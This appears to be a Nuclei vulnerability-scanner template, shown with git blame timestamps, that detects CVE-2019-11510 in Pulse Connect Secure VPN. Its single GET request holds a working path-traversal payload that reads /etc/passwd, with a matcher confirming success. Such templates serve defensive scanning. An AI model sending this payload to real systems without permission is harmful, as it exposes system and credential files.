nuclei-templates/cves/2019/CVE-2019-11510.yaml

23 lines
609 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-11510
2020-04-22 06:42:01 +00:00
info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
tags: cve,cve2019,pulsesecure,traversal
2020-05-25 07:49:06 +00:00
2020-04-22 06:42:01 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
2020-04-22 06:42:01 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
2020-04-22 06:42:01 +00:00
- type: regex
regex:
2020-05-25 07:49:06 +00:00
- "root:[x*]:0:0:"
2020-04-22 06:42:01 +00:00
part: body